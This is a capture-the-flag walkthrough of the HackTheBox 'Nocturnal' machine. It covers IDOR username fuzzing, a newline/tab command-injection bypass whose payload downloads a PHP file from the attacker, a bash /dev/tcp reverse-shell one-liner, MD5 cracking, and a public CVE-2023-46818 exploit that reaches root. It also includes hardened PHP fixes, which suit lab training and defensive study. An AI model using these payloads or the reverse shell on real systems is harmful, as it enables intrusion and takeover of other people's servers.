Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 13 Apr 2025
IP: 10.10.11.64

🕵️ Enumeration & Initial Access

🔍 Nmap Scan

```text
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu
80/tcp open  http    nginx 1.18.0
```

The web server redirected to http://nocturnal.htb, so I added that hostname to /etc/hosts.

🕸️ Web Application Analysis

htb-noc1.png

I registered a test account and noticed that the file viewer enforced no access control: view.php takes the file owner from the username= query parameter and trusts it, so supplying another user's name returned that user's files (an insecure direct object reference, IDOR).

htb-noc2.png

👀 Username Fuzzing

Using ffuf, I discovered valid usernames by filtering on response size: the viewer returned 2985 bytes for a username that does not exist, so -fs 2985 hides those and leaves only the names the application recognises. The PHPSESSID of my test account is sent along so the requests are made as an authenticated user:

```bash
ffuf -u "http://nocturnal.htb/view.php?username=FUZZ&file=test.pdf" -w ../../wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt -fs 2985 -H "Cookie: PHPSESSID=f515ofbau2c7b662fgdt3pdus0"
```

```text
v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://nocturnal.htb/view.php?username=FUZZ&file=test.pdf
 :: Wordlist         : FUZZ: /mnt/f/ctf/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt
 :: Header           : Cookie: PHPSESSID=f515ofbau2c7b662fgdt3pdus0
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 2985
________________________________________________

admin                   [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 52ms]
amanda                  [Status: 200, Size: 3113, Words: 1175, Lines: 129, Duration: 46ms]
tobias                  [Status: 200, Size: 3037, Words: 1174, Lines: 129, Duration: 46ms]
admin1                  [Status: 200, Size: 3193, Words: 1176, Lines: 129, Duration: 49ms]
```
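The two observations above, that view.php trusts the username parameter and that its response size varies with whether a username exists, are two faces of one missing check. As an added example (my code, not the box's view.php, which this write-up does not show), the following reproduces that class of viewer next to a hardened version that takes the owner from the server-side session and returns the same generic response for every failure, so neither another user's files nor the set of valid usernames can be obtained through the file parameter. The upload path, the function names and the listing-on-miss behaviour of the vulnerable variant are assumptions.

```php
<?php
// Added example (not the box's code): the class of bug behind view.php?username=
// and a hardened replacement. The storage layout below is an assumption.

const UPLOAD_ROOT = '/var/www/uploads'; // assumed per-user upload root

// Vulnerable: the owner of the file is whatever the client put in ?username=.
// Any logged-in user can read any other user's files, "../" in ?file= is not
// rejected, and the per-user listing on a miss leaks which usernames exist
// (that is the response-size difference ffuf keys on).
function serveFileVulnerable(array $query): string
{
    $owner = $query['username'] ?? '';
    $file  = $query['file'] ?? '';
    $path  = UPLOAD_ROOT . '/' . $owner . '/' . $file;
    if (!is_file($path)) {
        $listing = @scandir(UPLOAD_ROOT . '/' . $owner) ?: [];
        return 'File not found. Available files: ' . implode(', ', array_diff($listing, ['.', '..']));
    }
    return file_get_contents($path);
}

// Hardened: the owner comes from the server-side session, never from the request;
// the file name must match a strict allow-list and must resolve inside the
// caller's own directory; every failure returns one identical response.
function serveFileHardened(array $session, array $query): string
{
    $owner = $session['username'] ?? null;          // set at login, not by the client
    $file  = $query['file'] ?? '';
    if ($owner === null) {
        return 'Forbidden';
    }
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,63}\z/', $file)) {
        return 'File not found';                    // rejects "..", "/", empty names
    }
    $base = realpath(UPLOAD_ROOT . '/' . $owner);
    $path = $base === false ? false : realpath($base . '/' . $file);
    if ($base === false || $path === false || strncmp($path, $base . '/', strlen($base) + 1) !== 0) {
        return 'File not found';                    // no listing, no per-user difference
    }
    return file_get_contents($path);
}

// Constructed request: attacker 'mallory' asks for amanda's document.
$query   = ['username' => 'amanda', 'file' => 'privacy.odt'];
$session = ['username' => 'mallory'];
echo serveFileVulnerable($query), PHP_EOL;          // amanda's file (or her listing) if present
echo serveFileHardened($session, $query), PHP_EOL;  // 'File not found': ?username= is ignored
```

The hardened variant deliberately answers an unknown file and a forbidden file with the same bytes; any difference there, even a few bytes, is exactly what the -fs filter above turns into a username oracle.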

📄 File Disclosure

Requesting a file under Amanda's username:

```text
http://nocturnal.htb/view.php?username=amanda&file=test-1.pdf
```

This exposed her uploaded document privacy.odt, which contained a password:

```text
arHkG7HAI68X8s1J
```

SSH login with these credentials failed, but they worked on the web application.

🛠️ Admin Panel Access

Amanda had access to the admin panel.

htb-noc3.png

While reviewing admin.php, I noticed a backup feature vulnerable to command injection: the user-supplied backup password is concatenated, unquoted, into a zip command string that is handed to a shell. The cleanEntry() blacklist rejects ';', '&', '|', '$', space, backtick and braces, but it says nothing about newline or tab, and htmlspecialchars() leaves both characters untouched.

```php
function cleanEntry($entry) {
    $blacklist_chars = [';', '&', '|', '$', ' ', '`', '{', '}', '&&'];

    foreach ($blacklist_chars as $char) {
        if (strpos($entry, $char) !== false) {
            return false; // Malicious input detected
        }
    }

    return htmlspecialchars($entry, ENT_QUOTES, 'UTF-8');
}

if (isset($_POST['backup']) && !empty($_POST['password'])) {
    $password = cleanEntry($_POST['password']);
    $backupFile = "backups/backup_" . date('Y-m-d') . ".zip";

    if ($password === false) {
        echo "<div class='error-message'>Error: Try another password.</div>";
    } else {
        $logFile = '/tmp/backup_' . uniqid() . '.log';

        // $password is interpolated unquoted into a string the shell will parse
        $command = "zip -x './backups/*' -r -P " . $password . " " . $backupFile . " . > " . $logFile . " 2>&1 &";

        $descriptor_spec = [
            0 => ["pipe", "r"],           // stdin
            1 => ["file", $logFile, "w"], // stdout
            2 => ["file", $logFile, "w"], // stderr
        ];
```

🚪 Command Injection Exploit

The blacklist blocks the space character but not tab (%09), and it blocks ';', '&' and '|' but not newline (%0A). A newline ends the zip command line, so whatever follows it runs as a separate command, and tabs stand in for spaces between that command's arguments. I sent the following as the backup password (URL-encoded); since zip runs from the application directory, which is also what nginx serves, wget drops shellrev.php where it can be requested over HTTP:

```text
%0Awget%09http%3A%2F%2F10.10.14.120%3A8001%2Fshellrev.php%0A
```
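To see why the blacklist fails and what the fix looks like, here is an added example (my code, not the box's or the author's): cleanEntry() and the command construction from admin.php are reproduced so the decoded payload can be run through them, followed by a hardened replacement that allow-lists the password and passes zip an argument array through proc_open(), so no shell ever parses user input. The hardened function names, the permitted password alphabet and the sample file names are assumptions.

```php
<?php
// Added example (not the box's code): the blacklist from admin.php, reproduced to
// exercise the bypass, followed by a hardened replacement.

function cleanEntry($entry) {
    $blacklist_chars = [';', '&', '|', '$', ' ', '`', '{', '}', '&&'];
    foreach ($blacklist_chars as $char) {
        if (strpos($entry, $char) !== false) {
            return false;
        }
    }
    return htmlspecialchars($entry, ENT_QUOTES, 'UTF-8');
}

// The command string exactly as admin.php builds it: shell metacharacters that
// survive the blacklist are interpolated verbatim ("\n" ends the zip command,
// "\t" separates words of whatever follows).
function buildBackupCommand($password, $backupFile, $logFile) {
    $clean = cleanEntry($password);
    if ($clean === false) {
        return false;
    }
    return "zip -x './backups/*' -r -P " . $clean . " " . $backupFile . " . > " . $logFile . " 2>&1 &";
}

// Hardened replacement (assumed names): allow-list the password instead of
// blacklisting characters, and give zip an argv array. proc_open() accepts an
// array since PHP 7.4 and execs the program directly, so there is no /bin/sh to
// inject into. If a shell string were unavoidable, escapeshellarg() on every
// interpolated value is the fallback.
function cleanEntryHardened($entry) {
    // Backup passwords: 8-64 characters from a fixed alphabet; newline and tab cannot match.
    return preg_match('/\A[A-Za-z0-9!@#%^*_+=.\-]{8,64}\z/', $entry) === 1 ? $entry : false;
}

function buildBackupArgv($password, $backupFile) {
    $clean = cleanEntryHardened($password);
    if ($clean === false) {
        return false;
    }
    // zip matches the -x pattern itself, so no quoting is needed without a shell.
    return ['zip', '-x', './backups/*', '-r', '-P', $clean, $backupFile, '.'];
}

// The write-up's payload, URL-decoded: "\nwget\thttp://10.10.14.120:8001/shellrev.php\n"
$payload = urldecode('%0Awget%09http%3A%2F%2F10.10.14.120%3A8001%2Fshellrev.php%0A');

var_dump(cleanEntry($payload) !== false);   // bool(true): nothing on the blacklist is present
echo buildBackupCommand($payload, 'backups/backup_2025-04-13.zip', '/tmp/backup_x.log'), PHP_EOL;
// The second line of that string is a stand-alone command: wget<TAB>http://10.10.14.120:8001/shellrev.php

var_dump(cleanEntryHardened($payload));     // bool(false): rejected by the allow-list
var_dump(buildBackupArgv('arHkG7HAI68X8s1J', 'backups/backup_2025-04-13.zip'));
// To run it: proc_open(buildBackupArgv(...), $descriptor_spec, $pipes); no shell is involved.
```

Blacklists of this kind fail because the set of characters a shell treats specially (newline, tab, redirection operators, quotes, globbing) is larger than any list a developer writes from memory; removing the shell from the call path removes the question.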

Shell file (shellrev.php):

```php
<?php exec("bash -c 'bash -i >& /dev/tcp/10.10.xx.xxx/1234 0>&1'"); ?>
```

htb-noc4.png

After triggering the backup with the payload and requesting the uploaded shell, I caught a reverse shell:

```bash
curl http://nocturnal.htb/shellrev.php
```

```text
nc -lvvnkp 1234
listening on [any] 1234 ...
connect to [10.10.xx.xxx] from (UNKNOWN) [10.10.11.64] 41272
bash: cannot set terminal process group (861): Inappropriate ioctl for device
bash: no job control in this shell
www-data@nocturnal:~/nocturnal.htb$
```

🔓 User Flag

Inside /var/www/nocturnal_database I found the web application's database file. It stored the users' passwords as unsalted MD5 hashes (hence --format=Raw-MD5), which John cracked against rockyou:

htb-noc5.png

```bash
john hash --wordlist=rockyou.txt --format=Raw-MD5
# tobias : slowmotionapocalypse
```

Logged in via SSH:

```text
ssh tobias@nocturnal.htb
tobias@nocturnal.htb's password:

tobias@nocturnal:~$ cat user.txt
6e34f71803141b48839bd95xxxxxx
```

Captured user.txt.


🚀 Privilege Escalation – Root Flag

🔎 Internal Service Discovery

```text
tobias@nocturnal:~$ netstat -punta | grep LISTEN
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:587           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -
```

Besides MySQL (3306 and 33060), a local mail server (25 and 587) and the systemd-resolved stub on 127.0.0.53:53, there was an unidentified web service bound to 127.0.0.1:8080 that was not reachable from outside.

🔐 Port Forwarding

Forwarding local port 8081 to the box's 127.0.0.1:8080 over SSH:

```bash
ssh -L 8081:127.0.0.1:8080 -N -f tobias@nocturnal.htb
```

Browsing to http://localhost:8081 showed an ISPConfig login page.

htb-noc6.png

Tobias's cracked password, reused for the ISPConfig admin account, worked:

```text
admin : slowmotionapocalypse
```

Success!

🧨 ISPConfig RCE – CVE-2023-46818

The instance ran ISPConfig 3.2.10p1, which is affected by CVE-2023-46818: an authenticated administrator can inject PHP code through the panel's language file editor (which is why the PoC fetches a language_edit CSRF token), and the flaw was fixed in 3.2.11p1. Exploitation therefore requires admin credentials, which the password reuse above supplied, and on this host the panel's PHP executes as root, as the id output shows. I used this PoC:

https://github.com/ajdumanhug/CVE-2023-46818.git

```text
python3 CVE-2023-46818.py http://localhost:8081 admin slowmotionapocalypse
[+] Logging in with username 'admin' and password 'slowmotionapocalypse'
[+] Login successful!
[+] Fetching CSRF tokens...
[+] CSRF ID: language_edit_c28c5e14df61508036db6d2d
[+] CSRF Key: adf3643649dacfee88e3eaba82e867c02011682a
[+] Injecting shell payload...
[+] Shell written to: http://localhost:8081/admin/sh.php
[+] Launching shell...

ispconfig-shell# id
uid=0(root) gid=0(root) groups=0(root)

ispconfig-shell# cat /root/root.txt
e242c019b2bdfe5817c0656xxxxxxxxxxx
```

And finally…
🎉 Got the root flag!